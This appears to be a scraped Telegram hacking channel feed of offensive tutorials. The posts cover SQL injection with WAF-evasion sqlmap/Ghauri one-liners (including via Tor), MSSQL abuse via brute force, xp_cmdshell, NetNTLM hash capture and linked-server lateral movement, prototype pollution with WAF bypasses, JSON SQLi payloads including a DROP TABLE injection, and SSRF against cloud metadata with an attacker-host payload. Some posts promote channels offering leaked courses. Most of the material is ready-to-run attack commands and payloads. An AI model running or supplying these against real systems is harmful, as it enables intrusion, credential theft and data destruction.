ExploitQuest

"I discovered a vulnerability in a website that allowed me to escalate my privileges from a regular user to an admin. This privilege escalation granted me access to other users' data, the full database, and the admin control panel."

https://t.me/ExploitQuest

❤22🤯10👍4🔥3🤷2

9.92K viewsedited 08:18

ExploitQuest

ExploitQuest pinned a video

18:45

ExploitQuest

Changing HTTP Request Methods and Their Security Impact
When we send a GET request to a website like site.com, we usually receive an HTML page or another expected response.

But what happens if we change the request method to POST, PUT, or DELETE?

This can lead to different reactions from the server, such as:

1-Rejecting the request and returning 405 Method Not Allowed.

2-Processing the request in an
unexpected way, potentially causing errors or data leaks.

3-In rare cases, this can lead to
severe security vulnerabilities, such as Remote Code Execution (RCE).

━━━━━━━━━━━━━━━━━━

Impact on Web Frameworks (e.g., Laravel)

Some web frameworks, like Laravel, return sensitive information when an error occurs, especially if debug mode is enabled. Changing the request method unexpectedly may trigger errors that expose:

•Database credentials.

•Environment variables.

•File paths and internal configurations.

In some cases, improper handling of user input can even lead to RCE vulnerabilities, allowing an attacker to execute commands on the server.

━━━━━━━━━━━━━━━━━━

Practical Examples

Example 1: 405 Error When Changing Method

Trying to send a POST request to an endpoint that only allows GET:

curl -X POST http://example.com/

The server might respond with:

HTTP/1.1 405 Method Not Allowed

Example 2: Internal Error Due to Unexpected Request

If a server encounters an error when

processing an unexpected request method, it might return:

HTTP/1.1 500 Internal Server Error

In Laravel, if APP_DEBUG=true, it might expose sensitive details like:

SQLSTATE[HY000] [1045] Access denied for user 'root'@'localhost'

This could reveal database credentials or configuration files.

Example 3: RCE Exploitation in Laravel

If an application uses eval() or system() with unsanitized user input, an attacker may be able to execute system commands by altering the request:

curl -X DELETE http://example.com/delete_user --data "id=1; system('whoami');"

If the server is not properly filtering input, it may execute the whoami command and return the server's user name.

#SQLi #XSS #RCE #LFI #WebSecurity #Exploit #CVE

👍5🔥2❤1

4.91K views23:14

ExploitQuest

A Simple Yet Effective Way to Find SQLI Vulnerabilities

Sometimes, simple methods work best when hunting for SQL injection (SQLI) vulnerabilities. Here’s an optimized approach:

1. Extract Potential Targets
Use Wayback Machine URLs to find historical URLs with parameters:

waybackurls --dates target.com | grep '?id='

This helps identify pages that may still be vulnerable.

━━━━━━━━━━━━━━━━━━

2. Test for SQLI Sleep-Based Vulnerabilities
Use the following payload:

if(now()=sysdate(),SLEEP(8),0)

If the response is delayed by ~8 seconds, the parameter is likely injectable.

━━━━━━━━━━━━━━━━━━

3. Manual Testing with cURL

curl -X GET "https://target.com/page.php?id=1" --data-urlencode "id=1' OR if(now()=sysdate(),SLEEP(8),0) -- -" -H "X-Forwarded-For: 127.0.0.1"

•The X-Forwarded-For header may help bypass basic IP-based WAF restrictions.

•Modify headers like User-Agent to mimic real traffic.

━━━━━━━━━━━━━━━━━━

4. Automated Testing with Ghauri (Bypassing WAFs)

ghauri -u "https://target.com/page.php?id=1" --timeout=30 --delay=5 --technique=BEST --level=3 --prefix="/**/" --suffix="-- -" --safe-chars="[]" --random-agent --ignore-code=403

--timeout=30: Sets the request timeout to 30 seconds.

--delay=5: Adds a 5-second delay between requests to avoid detection.

--technique=BEST: Uses the most effective SQL injection techniques.

--level=3: Performs more advanced tests for better detection.

--prefix="/**/": Adds a comment prefix to bypass WAF filters.

--suffix="-- -": Ends the payload with a SQL comment to evade detection.

--safe-chars="[]": Prevents certain characters from being URL-encoded.

--random-agent: Uses a random User-Agent to avoid fingerprinting.

--ignore-code=403: Ignores 403 Forbidden responses to continue scanning.

━━━━━━━━━━━━━━━━━━

5. Advanced Testing with SQLMap

sqlmap -u "https://target.com/page.php?id=1" --batch --random-agent --tamper="between,space2comment,charencode" --timeout=15 --time-sec=8 --level=5 --risk=3

--random-agent: Uses random user-agents to avoid detection.

--tamper: Applies obfuscation techniques to evade WAFs.

--risk=3 --level=5: Enables deep scanning with advanced payloads.

━━━━━━━━━━━━━━━━━━

Conclusion
✅ Wayback Machine helps find old endpoints.

✅ Manual payloads help confirm basic SQL injection.

✅ Ghauri & SQLMap provide automation with WAF bypass techniques.

━━━━━━━━━━━━━━━━━━

[https://t.me/ExploitQuest]

#BugBounty #SQLi #SQLInjection #PenTesting #CyberSecurity #EthicalHacking #InfoSec #RedTeam #WebSecurity #Hacking #BugHunter #WAFBypas

ExploitQuest

contact: @ExploitQuestbot

❤8👍2🔥1

3.7K views22:09

ExploitQuest

Here is a more optimized one-liner for finding SQL injection vulnerabilities while bypassing WAF efficiently:

gau target.com | grep '=' | anew urls.txt | httpx -silent -status-code -mc 200 | awk '{print $1}' | xargs -I{} sqlmap -u "{}" --random-agent --tamper="between,space2comment,charencode" --level=5 --risk=3 --batch --threads=10 --time-sec=5

More aggressive alternative for bypassing WAF with Tor and Hex encoding:

gau target.com | grep '=' | anew urls.txt | httpx -silent -status-code -mc 200 | awk '{print $1}' | xargs -I{} sqlmap -u "{}" --random-agent --tor --proxy="socks5://127.0.0.1:9050" --tamper="space2comment,charencode,randomcase" --hex --batch --threads=5 --timeout=10

Try it and see the results!

👍6👏3

2.85K views22:21

ExploitQuest

These commands and URLs are used for gathering and analyzing data about a specific domain (example.com in this case).
The goal is to identify exposed files, sensitive information, and security-related data. Here's a breakdown:

1️⃣ Using Archive.org to Find Archived URLs
URL:

https://web.archive.org/cdx/search/cdx?url=*.example.com/*&collapse=urlkey&output=text&fl=original

Explanation:

•This query retrieves all archived URLs of example.com from Wayback Machine.

•*.example.com/* searches for all subdomains and pages.

•collapse=urlkey removes duplicate URLs.

•output=text formats the output as
plain text.

•fl=original extracts only the original URLs without extra metadata.

━━━━━━━━━━━━━━━━━━

2️⃣ Using VirusTotal to Get a Domain Report
URL:

https://www.virustotal.com/vtapi/v2/domain/report?apikey=YOUR_API_KEY&domain=example.com

Explanation:

•Retrieves a security report for example.com from VirusTotal.

•This report includes:
Blacklist status
Malicious activities detected
Known associated malicious URLs

•Replace YOUR_API_KEY with a valid VirusTotal API key.

━━━━━━━━━━━━━━━━━━

3️⃣ Using AlienVault OTX to Fetch URLs Related to a Domain
URL:

https://otx.alienvault.com/api/v1/indicators/hostname/domain.com/url_list?limit=500&page=1

Explanation:

•Queries AlienVault OTX for URLs associated with domain.com.

•limit=500 retrieves up to 500 URLs per page.

•page=1 fetches the first page of results.

━━━━━━━━━━━━━━━━━━

4️⃣ Using curl to Fetch Archived URLs and Save Them to a File
Command:

curl -G "https://web.archive.org/cdx/search/cdx" \
  --data-urlencode "url=*.example.com/*" \
  --data-urlencode "collapse=urlkey" \
  --data-urlencode "output=text" \
  --data-urlencode "fl=original" > out.txt

Explanation:

•Fetches all archived URLs of example.com from Wayback Machine.

•Saves the output to out.txt for further processing.

━━━━━━━━━━━━━━━━━━

5️⃣ Extracting Sensitive Files Using uro and grep
Command:

cat out.txt | uro | grep -E '\.xls|\.xml|\.xlsx|\.json|\.pdf|\.sql|\.doc|\.docx|\.pptx|\.txt|\.zip|\.tar\.gz|\.tgz|\.bak|\.7z|\.rar|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.gz|\.config|\.csv|\.yaml|\.md|\.md5|\.exe|\.dll|\.bin|\.ini|\.bat|\.sh|\.tar|\.deb|\.rpm|\.iso|\.img|\.apk|\.msi|\.dmg|\.tmp|\.crt|\.pem|\.key|\.pub|\.asc'

Explanation:

1-cat out.txt → Reads the archived URLs from out.txt.

2-uro → Deduplicates and normalizes URLs.

3-grep -E → Uses regular expressions (regex) to extract potentially sensitive files, such as:

•Database files: .sql, .db, .backup
•Documents: .xls, .xlsx, .doc, .pdf, .txt
•Compressed archives: .zip, .tar.gz, .rar, .7z
•Encryption keys: .pem, .crt, .key, .asc
•Configuration files: .config, .ini, .yaml, .yml
•Executable files: .exe, .dll, .apk, .msi

━━━━━━━━━━━━━━━━━━

🔍 Summary:

These commands help in discovering and analyzing sensitive files that might be publicly accessible by:

1-Fetching archived URLs from Wayback Machine.

2-Checking for malicious activity on VirusTotal and AlienVault.

3-Filtering sensitive files using grep and uro.

[https://t.me/ExploitQuest]

#BugBounty #SQLi #SQLInjection #PenTesting #CyberSecurity #EthicalHacking #InfoSec #RedTeam #WebSecurity #Hacking #BugHunter #WAFBypas

❤6👍5

3.08K viewsedited 09:02

ExploitQuest

🔹Microsoft SQL Server Abuse Techniques 🔹

👋 Hello, friends!
I often discuss Microsoft SQL Server (MSSQL) abuse in interviews, and surprisingly, many people have only a superficial understanding of it. However, MSSQL is widely used in corporate networks, and if misconfigured, it can become a valuable entry point for attackers.

In this post, I have gathered the main MSSQL abuse techniques to help you:

✅ Understand possible attack vectors.

✅ Prepare for interviews.

✅ Organize your knowledge.

━━━━━━━━━━━━━━━━━━

📖 MSSQL Basics
Microsoft SQL Server (MSSQL) is a relational database management system (DBMS) developed by Microsoft, commonly used in corporate environments for storing and processing data.

🔹 Main Components:

✅ Database Engine – Stores, processes, and manages data.

✅ SQL Server Agent – Automates tasks (e.g., backups).

✅ SQL Server Browser – Helps clients find MSSQL instances.

✅ SSIS (Integration Services) – Handles data integration.

✅ SSRS (Reporting Services) – Generates reports.

✅ SSAS (Analysis Services) – Provides analytics and data processing.

🔹 User Roles in MSSQL:

🔸 sysadmin – Full privileges on the server.

🔸 db_owner – Full rights within a specific database.

🔸 db_datareader – Read-only access.

🔸 db_datawriter – Ability to modify data.

🔸 public – Default role for all users (may have more permissions than expected).

🔹 Authentication Methods:

🔹 Windows Authentication – Uses NTLM/Kerberos for domain-based authentication.

🔹 SQL Authentication – Uses local MSSQL accounts (e.g., sa, custom user logins).

🔍 Detecting MSSQL on the Network
Before attacking, you must first locate MSSQL instances.

🔹 PowerUpSQL (PowerShell)

Get-SQLInstanceDomain

🔹 Nmap

nmap -p 1433 --script ms-sql-info <IP>

🔹 Metasploit

use auxiliary/scanner/mssql/mssql_ping

🔹 go-windapsearch

go-windapsearch -d domain.local -u Administrator -p 'password1111' -m custom --filter="(&(objectClass=computer)(servicePrincipalName=*MSSQLSvc/*))" --attrs cn,servicePrincipalName

🔑 Gaining Access to MSSQL
🔹 Brute Force Attack

hydra -L users.txt -P pass.txt <IP> mssql
netexec mssql <target-ip> -u username -p passwords.txt

━━━━━━━━━━━━━━━━━━

🚀 Privilege Escalation: Local Admin → Sysadmin

The main MSSQL process (sqlservr.exe) runs under a Windows account with limited privileges, but inside SQL Server, it is often assigned sysadmin by default. Compromising this service can lead to full domain control!

🔹 Step 1: Find Local MSSQL

Get-SQLInstanceLocal

🔹 Step 2: Impersonate SQL Service Accounts

Invoke-SQLImpersonateService -Verbose -Instance your_instance_name

🎯 Executing OS Commands via MSSQL
If an attacker gains access to MSSQL, they can execute Windows commands using:

🔹 CLR (Common Language Runtime) Assembly
Allows executing .NET code (C#, VB.NET) inside MSSQL.

Invoke-SQLOSCLR -Username sa -Password Pass123 -Instance your_instance_name -Command "whoami"

🔹 OLE Automation Procedures
Allows running COM objects from T-SQL.

Invoke-SQLOSOle -Username sa -Password Pass123 -ServerInstance <IP> -Command "whoami"

🔹 xp_cmdshell (Built-in Stored Procedure)
Executes Windows commands directly from MSSQL.

EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXEC xp_cmdshell 'whoami';

Invoke-SQLOSCmd -Username sa -Password sa -Instance your_instance_name -Command "whoami"

━━━━━━━━━━━━━━━━━━

🔚 Conclusion
MSSQL misconfigurations can lead to serious security risks, including:
⚠ Unauthorized access to databases.
⚠ Privilege escalation to sysadmin.
⚠ Remote code execution (RCE).
⚠ Lateral movement across corporate networks.
🔍 Understanding these techniques is essential for security professionals to prevent attacks and secure corporate environments. Stay safe! 🚀

[https://t.me/ExploitQuest]

#CyberSecurity #MSSQL #EthicalHacking

ExploitQuest

contact: @ExploitQuestbot

👍8🔥5

2.83K views00:40

ExploitQuest

MSSQL Exploitation Techniques

🔹 External Scripts (Python/R) – Allows executing Python & R code in Microsoft SQL Server.

-- Execute Python script
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))'

-- Execute R script
EXEC sp_execute_external_script
@language=N'R',
@script=N'OutputDataSet <- data.frame(system("cmd.exe /c whoami",intern=T))'
WITH RESULT SETS (([cmd_out] text));

PowerUpSQL Commands:

# Remote Execution
Invoke-SQLOSCmdPython -Username sa -Password Pass123 -Instance your_instance_name -Command "whoami"
Invoke-SQLOSCmdR -Username sa -Password Pass123 -Instance your_instance_name -Command "whoami"

# Local Execution
Get-SQLInstanceLocal | Invoke-SQLOSCmdPython -Verbose -Command "whoami"
Get-SQLInstanceLocal | Invoke-SQLOSCmdR -Verbose -Command "whoami"

🔹 UNC Path Injection – Extracts NetNTLM hashes via SMB.

EXEC xp_cmdshell 'net use Z:\\YOUR_IP\share';

PowerUpSQL Command:

Invoke-SQLUncPathInjection -Verbose -CaptureIp YourResponderHost

🔹 Lateral Movement via Linked Servers
Linked Servers allow connections to other SQL Servers, MySQL, Oracle, PostgreSQL, and more.

-- List Linked Servers
EXEC sp_linkedservers;

-- Execute command on remote server
EXEC ('whoami') AT [LINKED_SERVER];

PowerUpSQL Commands:

# Find linked servers
Get-SQLServerLink -Instance YourInstance -Verbose

# Check privileges on remote server
Get-SQLServerLinkCrawl -Instance YourInstance -Verbose

# Enable xp_cmdshell on linked server
Get-SQLServerLinkCrawl -Instance YourInstance -Query "EXEC ('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE; EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT YOUR_LINKED_SERVER"

🔥 That's all, friends!
Happy hacking and see you next time! 🚀

#RedTeam #MSSQL #BugBounty #CyberSecurity

👍5❤4🤯3

3.34K views02:16

ExploitQuest

Prototype Pollution Vulnerability
Prototype Pollution is a security vulnerability in JavaScript that allows an attacker to add arbitrary properties to the prototype (the root object) of a general object. This enables an attacker to modify object properties that would typically be inaccessible.

However, this vulnerability alone is not always exploitable. To increase its impact, an attacker often combines it with other vulnerabilities like Cross-Site Scripting (XSS) to execute malicious actions.

━━━━━━━━━━━━━━━━━━

Understanding JavaScript Object Prototypes
In JavaScript, everything is an object. An object is essentially a collection of key-value pairs where values can be of any data type, such as boolean, string, integer, etc.

Creating an object in JavaScript is simple:

let userInfo = {
    "username": "admin",
    "password": "1qaz2wsx3edc",
    "email": "admin@victim.com"
};

To access properties of this object, we can use two methods:

1-Dot notation:

userInfo.username;

Bracket notation:

userInfo["username"];

One of these methods is used for polluting the prototype of an object.

━━━━━━━━━━━━━━━━━━

How Prototype Pollution Works
When a property of an object is accessed, the JavaScript engine first looks for it inside the object itself.

•If the property does not exist in the object, JavaScript traverses up the prototype chain to find it in the parent prototype.
To better understand this, open the browser Console and create an object. JavaScript will automatically connect it to one of the built-in prototypes based on its type.

Example:

var name = "Arya";
console.log(name.proto);

Since "Arya" is a string, it inherits all properties from JavaScript's String prototype.
Using dot notation or bracket notation, we can see various inherited properties that were not explicitly defined.

Moreover, we can manually reference an object's prototype using:

a.proto;

Ex

ploiting Prototype Pollution
If an attacker overwrites a property in a prototype that is being used in the frontend or backend of a web application, it can lead to serious security issues.

━━━━━━━━━━━━━━━━━━

Testing for Prototype Pollution
To test for Prototype Pollution, modify the URL as follows and send a request:

1️⃣ Dot Notation Approach

http://target.com/?proto.arya=arya

2️⃣ Bracket Notation Approach

http://target.com/?proto[arya]=arya

Bypassing WAF (Web Application Firewall)

If the WAF blocks the proto keyword, we can use constructor-based techniques:

/?constructor.prototype.arya=arya
/?constructor[prototype][arya]=arya

If the WAF still blocks requests, we can use nested obfuscation techniques:

/?proprototo[arya]=arya
/?proprototo.arya=arya
/?constconstructorructor[protoprototypetype][arya]=arya
/?constconstructorructor.protoprototypetype.arya=arya

Confirming
the Vulnerability
To check if the property was successfully polluted, create an empty object in the browser console and try accessing the polluted property:

let test = {};
console.log(test.arya); // Output: " arya"

If the property value appears, the Prototype Pollution vulnerability exists on the target system.

━━━━━━━━━━━━━━━━━━

Conclusion
Prototype Pollution is a powerful vulnerability that, when combined with other exploits, can lead to serious security risks. Understanding how JavaScript's prototype system works is essential for both attackers and defenders to identify and mitigate such threats effectively.

[https://t.me/ExploitQuest]

#CyberSecurity #MSSQL #EthicalHacking
#PrototypePollution
#JavaScriptSecurity
#WebSecurity
#BugBounty
#EthicalHacking
#CyberSecurity
#SecurityResearch
#WebHacking

Target

Target : Expect More. Pay Less.

Shop Target online and in-store for everything from groceries and essentials to clothing and electronics. Choose contactless pickup or delivery today.

❤7👍6🔥4

3.77K viewsedited 22:22

ExploitQuest

أهلاً وسهلاً بكم جميعاً،
هذه مجموعة من القنوات الخاصة بنا والتي قد تفيدكم خلال رحلتكم في المجال التقني وخاصةً في الأمن السيبراني.

@end_k

قناتنا المشتركة والتي تحتوي على بثوث مباشرة ومحتوى مميز وغير مسبوق.

@iiLinux

قناة عامة تقوم بنشر التقنيات العامة و تتميز بشروحات لينكس.

@GlobalRedHat

المجتمع الرسمي للقراصنة ذوي القبعة الحمراء.

@k7ali_linux

قناة تخص شروحات كالي لينكس بشكل مختلف ومتميز.

@ExploitQuest

قناة تهتم باكتشاف الثغرات و استغلالها بالإضافة إلى الشروحات المميزة فيها.

@EgyptianshieldTOOLS

قناة خاصة بالأدوات المستخدمة في البرمجة والأمن السيبراني.

@iiMrDark

قناة تقدم محتوى خاص بالتسريبات والبرامج.

@Wa3i_Tech

قناة تقدم الوعي في الأمن السيبراني وشروحات مبسطة.

@codearabs

قناة مختصة بتسريب كورسات الشركات المشهورة في المجالات التقنية.

@Egyshield

قناة مختصة بالشروحات والأخبار التقنية وتحديداً في البرمجة والأمن السيبراني.

@Bad_Rabbit_Team

قناة Bad Rabbit – قناة متخصصة في الهجمات السيبرانية، تقدم شروحات عملية عن اختبار الاختراق، تحليل الثغرات، وأدوات الهجوم الإلكتروني.

@GlobalRedTeam

المجتمع الرسمي لـGlobal Red Team

@darkcsc

قناة خاصة بعلم الحاسوب وتحتوي على شروحات تخص الحاسوب بشكل عام.

👍4❤2

3.72K views00:19

ExploitQuest

A Real-World Example of Prototype Pollution Exploitation

A hacker was testing a target and noticed that it didn’t properly validate user inputs, allowing multiple XSS vulnerabilities. This led them to wonder if they could directly manipulate the Prototype via the URL.

To test for Prototype Pollution, they started with the following request:

https://target.com/?proto.arya=arya

However, the WAF (Web Application Firewall) blocked this attempt.

To bypass it, they got creative and modified the payload:

https://target.com/?proprototo.arya=arya

To confirm if the vulnerability was present, they opened the browser console and created an empty object:

test = {};
test.arya; // Outputs: "arya"

Since the property (arya) was successfully injected into the object, Prototype Pollution was confirmed!

But Prototype Pollution alone has no significant impact, so they needed to chain it with another vulnerability—like XSS—to escalate the attack.

━━━━━━━━━━━━━━━━━━

Leveraging Web Archives for Further Exploitation

While analyzing the target’s Web Archive, the hacker noticed many URLs contained # followed by useful information.

Reminder:
Everything after # in a URL is not sent to the server but is processed directly by the DOM, meaning the WAF won’t block it!

The hacker decided to test this method:

https://target.com/#proto.arya=arya

By following the same console-based verification, they confirmed the attack worked.

━━━━━━━━━━━━━━━━━━

Turning Prototype Pollution into
XSS

Through behavior analysis, they discovered that injected values were being inserted into the style attribute of HTML elements.

Now, they could escalate this attack by chaining Prototype Pollution with XSS:

https://target.com/#proto[onload]=alert(1)

━━━━━━━━━━━━━━━━━━

Prototype Pollution - Server Side

Prototype Pollution isn’t just a client-side issue—it can also be exploited on the server side.

If a Node.js server uses libraries that improperly merge user input into objects (e.g., lodash, merge, deepExtend, setValue), it becomes vulnerable!

Example of a Vulnerable Node.js Code

const _ = require('lodash');  
const express = require('express');  
const app = express();  

app.use(express.json());  

app.post('/update', (req, res) => {  
    let defaultConfig = { role: 'user' };  
    let userConfig = req.body;  

    let finalConfig = _.merge({}, defaultConfig, userConfig);  

    res.json(finalConfig);  
});  

app.listen(3000, () => console.log("Server running on port 3000"));

Where’s the Problem?

The function _.merge() merges user input with the defaultConfig object.

If an attacker sends a payload with proto, they can modify the prototype of all objects in the application!

━━━━━━━━━━━━━━━━━━

Attack Scenario (Exploiting the
Above Code)

The hacker discovers an API endpoint /update that sets user roles.

They send the following malicious request:

POST /update HTTP/1.1
Host: target.com
Content-Type: application/json

{
"proto": { "isAdmin":
true }
}

What Happens?
Since proto affects Object.prototype, every new object created in the application will automatically have isAdmin = true!

Conclusion
Prototype Pollution is a serious vulnerability that can be exploited both client-side and server-side.
When combined with other vulnerabilities (like XSS, RCE, or privilege escalation), it can have a critical impact.
Developers should use secure coding practices and avoid unsafe object merging in applications.

[https://t.me/ExploitQuest]

Target

Target : Expect More. Pay Less.

Shop Target online and in-store for everything from groceries and essentials to clothing and electronics. Choose contactless pickup or delivery today.

❤7👍6🔥4🤯1

4.34K viewsedited 04:10

ExploitQuest

Forwarded from s4rrar

قناتنا المشتركة والتي تحتوي على بثوث مباشرة ومحتوى مميز وغير مسبوق.

@iiLinux

قناة عامة تقوم بنشر التقنيات العامة و تتميز بشروحات لينكس.

@GlobalRedHat

المجتمع الرسمي للقراصنة ذوي القبعة الحمراء.

@k7ali_linux

قناة تخص شروحات كالي لينكس بشكل مختلف ومتميز.

@ExploitQuest

قناة تهتم باكتشاف الثغرات و استغلالها بالإضافة إلى الشروحات المميزة فيها.

@EgyptianshieldTOOLS

قناة خاصة بالأدوات المستخدمة في البرمجة والأمن السيبراني.

@iiMrDark

قناة تقدم محتوى خاص بالتسريبات والبرامج.

@Wa3i_Tech

قناة تقدم الوعي في الأمن السيبراني وشروحات مبسطة.

@codearabs

قناة مختصة بتسريب كورسات الشركات المشهورة في المجالات التقنية.

@Egyshield

قناة مختصة بالشروحات والأخبار التقنية وتحديداً في البرمجة والأمن السيبراني.

@Bad_Rabbit_Team

قناة Bad Rabbit – قناة متخصصة في الهجمات السيبرانية، تقدم شروحات عملية عن اختبار الاختراق، تحليل الثغرات، وأدوات الهجوم الإلكتروني.

@GlobalRedTeam

المجتمع الرسمي لـGlobal Red Team

@darkcsc

قناة خاصة بعلم الحاسوب وتحتوي على شروحات تخص الحاسوب بشكل عام.

👍6👏1

5.47K views01:07

ExploitQuest

Forwarded from s4rrar

قناتنا المشتركة والتي تحتوي على بثوث مباشرة ومحتوى مميز وغير مسبوق.

@iiLinux

قناة عامة تقوم بنشر التقنيات العامة و تتميز بشروحات لينكس.

@GlobalRedHat

المجتمع الرسمي للقراصنة ذوي القبعة الحمراء.

@k7ali_linux

قناة تخص شروحات كالي لينكس بشكل مختلف ومتميز.

@ExploitQuest

قناة تهتم باكتشاف الثغرات و استغلالها بالإضافة إلى الشروحات المميزة فيها.

@EgyptianshieldTOOLS

قناة خاصة بالأدوات المستخدمة في البرمجة والأمن السيبراني.

@iiMrDark

قناة تقدم محتوى خاص بالتسريبات والبرامج.

@Wa3i_Tech

قناة تقدم الوعي في الأمن السيبراني وشروحات مبسطة.

@codearabs

قناة مختصة بتسريب كورسات الشركات المشهورة في المجالات التقنية.

@Egyshield

قناة مختصة بالشروحات والأخبار التقنية وتحديداً في البرمجة والأمن السيبراني.

@Bad_Rabbit_Team

قناة Bad Rabbit – قناة متخصصة في الهجمات السيبرانية، تقدم شروحات عملية عن اختبار الاختراق، تحليل الثغرات، وأدوات الهجوم الإلكتروني.

@GlobalRedTeam

المجتمع الرسمي لـGlobal Red Team

@darkcsc

قناة خاصة بعلم الحاسوب وتحتوي على شروحات تخص الحاسوب بشكل عام.

❤2

5.67K views22:03

ExploitQuest

أهلاً وسهلاً بكم جميعاً،
هذه مجموعة من القنوات الخاصة بنا والتي قد تفيدكم خلال رحلتكم في المجال التقني وخاصةً في الأمن السيبراني.

https://t.me/addlist/nD70sWRf83U4ZTA0

Meow ~ Onion

s4rrar invites you to add the folder “Meow ~ Onion”, which includes 10 chats.

5.72K views18:15

ExploitQuest

https://t.me/iiElite

NaN Value

- For educational purposes only.
- @nanvalue

3.84K views22:53

ExploitQuest

https://t.me/GitBook_s

Bug Bounty - GitBook

GitBooks, Notion, medium, Mindmaps, books
bug bounty, pentest, ctf, osint, labs, tools
writeUps, check list, Cheatsheet, tips, GitHub

3.61K views05:49

ExploitQuest

A Real-World Example of Prototype Pollution Exploitation A hacker was testing a target and noticed that it didn’t properly validate user inputs, allowing multiple XSS vulnerabilities. This led them to wonder if they could directly manipulate the Prototype…

💻

Advanced Guide to SQL Injection in APIs and JSON Endpoints

🧠 Introduction
In the modern web, APIs are everywhere — powering everything from web apps and mobile apps to IoT devices. However, developers often make the same classic mistakes when handling user input, especially in JSON-based RESTful APIs.

SQL Injection (SQLi), a well-known vulnerability, is still relevant and can exist within APIs if input validation and query handling are not properly secured.

This article explores advanced techniques for identifying and exploiting SQL injection in APIs, particularly in JSON payloads. It is tailored for penetration testers and bug bounty hunters seeking to level up their API testing game.

━━━━━━━━━━━━━━━

🔎

Finding SQLi in JSON APIs

📍

Where to Look

•POST requests with JSON bodies

•GraphQL endpoints

•PUT/PATCH methods with nested objects

•Endpoints with dynamic filters or search queries

🔍

Signs of Vulnerability

•Database-related error messages in API responses

•Unusual delays in response (time-based blind SQL)

•Reflection of user input in responses or logs

•Status code anomalies (e.g., 500 Internal Server Error)

━━━━━━━━━━━━━━━

🤡

Exploiting SQLi in JSON Payloads

Let’s say you’re testing the following API

POST /api/user/details HTTP/1.1
Host: vulnerable.site
Content-Type: application/json

{
  "username": "admin"
}

Try payload injection:

{
  "username": "' OR '1'='1"
}

🤖Or blind time-based:

{
  "username": "' OR SLEEP(5)--"
}

🤜

If the server response is delayed by 5 seconds, you’ve got a time-based blind SQLi.

🧪

Example Using curl

curl -X POST https://vulnerable.site/api/user/details \
  -H "Content-Type: application/json" \
  -d '{"username": "' OR 1=1 --"}'

🤜

Another JSON structure:

{
  "filter": {
    "email": "admin@site.com' OR '1'='1"
  }
}

Or nested objects:


{
  "user": {
    "id": "1'; DROP TABLE users;--"
  }
}

🔏

Tools You Can Use

•Burp Suite (Pro): Use the Intruder or Repeater to fuzz JSON payloads.

•SQLMap with --data and --json flags:

sqlmap -u https://vulnerable.site/api/login \
  --data '{"user":"admin","pass":"pass"}' \
--headers="Content-Type: application/json" \
  --level=5 --risk=3 --batch

•Postman: Manual testing and injection

•Nuclei with custom templates

━━━━━━━━━━━━━━━━━━

🧠 Tips for Advanced Hunters
Always analyze API docs (Swagger/OpenAPI) for parameter hints.

•Use Burp Collaborator for detecting out-of-band SQLi.

•Test for second-order injection, especially in multi-step flows.

•Try JSON-specific encoding, like:

•Unicode: \u0027 OR \u0031=\u0031

•Base64 in API params

━━━━━━━━━━━━━━━━━━

🛡️ Mitigation (For Blue Team Awareness)
Use parameterized queries / prepared statements

•Sanitize and validate input rigorously

•Apply WAF rules and anomaly detection for API behavior

•Implement rate limiting and access control

━━━━━━━━━━━━━━━━━━

😎Final Thoughts
SQL Injection is far from dead — it's just evolving. Modern APIs, especially those handling complex JSON bodies, often become attack vectors due to developer assumptions or insecure ORM usage. With the right mindset, tools, and techniques, ethical hackers can uncover and responsibly disclose serious vulnerabilities before attackers do.

🔡That's all, friends!
Happy hacking and see you next time!

🎁

#CyberSecurity #MSSQL #EthicalHacking #json
#api
#JavaScriptSecurity
#WebSecurity
#BugBounty #EthicalHacking #CyberSecurity
#SecurityResearch #WebHacking

Please open Telegram to view this post

VIEW IN TELEGRAM

❤9👍2🥰1

3.28K viewsedited 07:38

ExploitQuest

😠

Please open Telegram to view this post

VIEW IN TELEGRAM

❤6🤣4😁3😢1

2.59K views07:48

ExploitQuest

🕷️ Mastering SSRF: A Step-by-Step Guide to Finding and Exploiting Server-Side Request Forgery

Server-Side Request Forgery (SSRF) is a powerful vulnerability that occurs when a server fetches external resources based on user input. If exploited, it can lead to data leakage, access to internal systems, or even full infrastructure compromise.

Here’s a step-by-step guide to discovering and exploiting SSRF vulnerabilities:

━━━━━━━━━━━━━━━━━━

🔍 1. Identify Entry Points
Start by locating areas where the application sends outbound requests. Common sources include:

🔘Link previews

🔘File upload/download functionalities

🔘Webhooks

🔘PDF or image generation

🔘URL fetchers for screenshots or validators

If HTML or external content is processed, injecting a malicious URL can trick the server into making a request to your controlled endpoint.

Example:

<img src="http://attacker.com/payload"/>

━━━━━━━━━━━━━━━━━━

🧪

2. Analyze Error Responses
Test the server’s behavior by sending malformed URLs and observe the error responses:

🔘Connection refused

🔘Invalid hostname

🔘HTTP status codes like 403, 404, 500

These clues indicate whether the server is trying to make external requests.

Test Payloads:

http://invalid-url
http://example.local
http://127.0.0.1:9999

━━━━━━━━━━━━━━━━━━

🏠 3. Target Internal Resources
Once confirmed, aim for internal IP ranges such as:

🔘127.0.0.1

🔘10.x.x.x

🔘192.168.x.x

These often expose admin panels, internal APIs, or development services. Port scanning via SSRF is also possible by analyzing different response behaviors.

Example:

http://127.0.0.1:8000/admin

━━━━━━━━━━━━━━━━━━

😈

4. Access Cloud Metadata Services
In cloud environments (AWS, Azure, GCP), internal metadata endpoints may leak sensitive info like access keys and tokens.

Payloads:

🔘AWS:

http://169.254.169.254/latest/meta-data

🔘Azure:

http://169.254.169.254/metadata/instance?api-version=2021-02-01

Be sure to include necessary headers if required (e.g., Metadata: true for Azure).

━━━━━━━━━━━━━━━━━━

😀

5. Bypass Filters and WAFs
If filters are in place, use bypass techniques:

🔘URL encoding:

http://127%2E0%2E0%2E1

🔘Decimal IP:

http://2130706433 (equals 127.0.0.1)

🔘IPv6 format:

http://[::]

🔘Use redirections through open servers

Pro Tip: Use DNS rebinding or SSRF chaining with redirect-capable endpoints.

━━━━━━━━━━━━━━━━━━

👁

6. Exploit Blind SSRF
In blind SSRF cases, you won’t get visible feedback. Use external monitoring tools to detect interactions:

🔘Burp Collaborator

🔘Webhook.site

🔘Custom DNS loggers

Example:

http://your-collaborator-url.com

Monitor for DNS or HTTP logs to confirm server-side interaction.

━━━━━━━━━━━━━━━━━━

🎃

